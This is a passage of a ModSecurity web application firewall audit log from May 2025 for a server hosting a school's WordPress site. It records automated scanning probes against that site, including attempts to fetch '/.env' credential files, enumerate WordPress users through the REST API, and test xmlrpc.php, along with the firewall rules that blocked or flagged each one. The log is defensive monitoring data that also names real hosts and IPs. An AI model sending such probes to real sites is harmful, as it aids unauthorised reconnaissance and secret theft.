aB-YK8i6w7GTj2w44Z7jWAAAAME 103.236.140.4 45582 103.236.140.4 8181 --3f411b2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f411b2b-C-- demo.sayHello --3f411b2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f411b2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746901035218059 6384 (- - -) Stopwatch2: 1746901035218059 6384; combined=4789, p1=571, p2=3989, p3=35, p4=36, p5=95, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f411b2b-Z-- --f281611d-A-- [11/May/2025:03:07:43 +0700] aB-yDxLuBiaF9R054QC42AAAAAY 103.236.140.4 36700 103.236.140.4 8181 --f281611d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f281611d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f281611d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746907663483023 2519 (- - -) Stopwatch2: 1746907663483023 2519; combined=1210, p1=417, p2=764, p3=0, p4=0, p5=29, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f281611d-Z-- --b8acd570-A-- [11/May/2025:03:07:48 +0700] aB-yFNr9PbfRBMhzxmSxXgAAAEw 103.236.140.4 36780 103.236.140.4 8181 --b8acd570-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8acd570-C-- demo.sayHello --b8acd570-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8acd570-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746907668723247 5927 (- - -) Stopwatch2: 1746907668723247 5927; combined=4508, p1=547, p2=3731, p3=34, p4=36, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8acd570-Z-- --40052b4d-A-- [11/May/2025:03:22:42 +0700] aB-1kk8xOExV7lPH_DlPCAAAAMM 103.236.140.4 44830 103.236.140.4 8181 --40052b4d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 138.68.82.23 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --40052b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40052b4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746908562124661 1082 (- - -) Stopwatch2: 1746908562124661 1082; combined=339, p1=307, p2=0, p3=0, p4=0, p5=32, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40052b4d-Z-- --48257d6e-A-- [11/May/2025:03:26:26 +0700] aB-2cgpy530QiWmSS60QXwAAAFI 103.236.140.4 44860 103.236.140.4 8181 --48257d6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48257d6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48257d6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746908786944826 3253 (- - -) Stopwatch2: 1746908786944826 3253; combined=1344, p1=458, p2=851, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48257d6e-Z-- --e0b18737-A-- [11/May/2025:03:26:35 +0700] aB-2e-bs1CLLACKj-_yghAAAAI0 103.236.140.4 44864 103.236.140.4 8181 --e0b18737-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0b18737-C-- demo.sayHello --e0b18737-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0b18737-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746908795483183 6499 (- - -) Stopwatch2: 1746908795483183 6499; combined=4542, p1=600, p2=3664, p3=28, p4=31, p5=137, sr=82, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b18737-Z-- --0e970d72-A-- [11/May/2025:03:52:01 +0700] aB-8cUEuxCpmyy5aJPlNVQAAAAU 103.236.140.4 51562 103.236.140.4 8181 --0e970d72-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto g(7) play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --0e970d72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e970d72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746910321610342 936 (- - -) Stopwatch2: 1746910321610342 936; combined=339, p1=285, p2=0, p3=0, p4=0, p5=54, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e970d72-Z-- --085baa6e-A-- [11/May/2025:03:55:07 +0700] aB-9Kwpy530QiWmSS60ZygAAAFg 103.236.140.4 57192 103.236.140.4 8181 --085baa6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --085baa6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --085baa6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910507815567 2709 (- - -) Stopwatch2: 1746910507815567 2709; combined=1321, p1=423, p2=859, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --085baa6e-Z-- --d2cf066d-A-- [11/May/2025:03:55:15 +0700] aB-9M08xOExV7lPH_DlaZQAAAMs 103.236.140.4 57426 103.236.140.4 8181 --d2cf066d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d2cf066d-C-- demo.sayHello --d2cf066d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2cf066d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910515655114 6918 (- - -) Stopwatch2: 1746910515655114 6918; combined=4947, p1=620, p2=4089, p3=36, p4=37, p5=95, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2cf066d-Z-- --f2dd897f-A-- [11/May/2025:03:55:56 +0700] aB-9XObs1CLLACKj-_yqqwAAAJA 103.236.140.4 58514 103.236.140.4 8181 --f2dd897f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2dd897f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2dd897f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910556868802 3420 (- - -) Stopwatch2: 1746910556868802 3420; combined=1530, p1=562, p2=938, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2dd897f-Z-- --0f68ab16-A-- [11/May/2025:03:56:05 +0700] aB-9ZQpy530QiWmSS60aCgAAAFA 103.236.140.4 58770 103.236.140.4 8181 --0f68ab16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f68ab16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f68ab16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910565441138 3095 (- - -) Stopwatch2: 1746910565441138 3095; combined=1394, p1=466, p2=896, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f68ab16-Z-- --8576d44e-A-- [11/May/2025:03:56:06 +0700] aB-9Zk8xOExV7lPH_DlbLgAAANc 103.236.140.4 58788 103.236.140.4 8181 --8576d44e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.62 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8576d44e-C-- demo.sayHello --8576d44e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8576d44e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910566665368 6787 (- - -) Stopwatch2: 1746910566665368 6787; combined=4853, p1=649, p2=3953, p3=38, p4=43, p5=100, sr=134, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8576d44e-Z-- --2c4e8d14-A-- [11/May/2025:03:56:11 +0700] aB-9a0EuxCpmyy5aJPlPLwAAAAE 103.236.140.4 58932 103.236.140.4 8181 --2c4e8d14-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2c4e8d14-C-- demo.sayHello --2c4e8d14-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c4e8d14-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910571601205 17469 (- - -) Stopwatch2: 1746910571601205 17469; combined=26182, p1=587, p2=3981, p3=42, p4=42, p5=10780, sr=74, sw=83, l=0, gc=10667 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c4e8d14-Z-- --25210433-A-- [11/May/2025:03:56:33 +0700] aB-9gUEuxCpmyy5aJPlPUQAAAAw 103.236.140.4 59486 103.236.140.4 8181 --25210433-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --25210433-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25210433-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910593378449 3114 (- - -) Stopwatch2: 1746910593378449 3114; combined=1303, p1=398, p2=822, p3=0, p4=0, p5=83, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25210433-Z-- --a818eb59-A-- [11/May/2025:03:56:35 +0700] aB-9gwpy530QiWmSS60aOgAAAEQ 103.236.140.4 59536 103.236.140.4 8181 --a818eb59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a818eb59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a818eb59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746910595022019 2672 (- - -) Stopwatch2: 1746910595022019 2672; combined=1454, p1=504, p2=919, p3=0, p4=0, p5=31, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a818eb59-Z-- --3fe1bf7c-A-- [11/May/2025:03:56:41 +0700] aB-9iQpy530QiWmSS60aSgAAAEc 103.236.140.4 59688 103.236.140.4 8181 --3fe1bf7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fe1bf7c-C-- demo.sayHello --3fe1bf7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fe1bf7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910601201017 4034 (- - -) Stopwatch2: 1746910601201017 4034; combined=3129, p1=397, p2=2555, p3=19, p4=20, p5=80, sr=53, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe1bf7c-Z-- --3a5b2d08-A-- [11/May/2025:03:56:44 +0700] aB-9jApy530QiWmSS60aTAAAAEY 103.236.140.4 59780 103.236.140.4 8181 --3a5b2d08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a5b2d08-C-- demo.sayHello --3a5b2d08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a5b2d08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746910604828490 6211 (- - -) Stopwatch2: 1746910604828490 6211; combined=4435, p1=594, p2=3598, p3=38, p4=42, p5=98, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a5b2d08-Z-- --0b163a56-A-- [11/May/2025:03:57:03 +0700] aB-9n08xOExV7lPH_Dlb1gAAANU 103.236.140.4 60250 103.236.140.4 8181 --0b163a56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.33 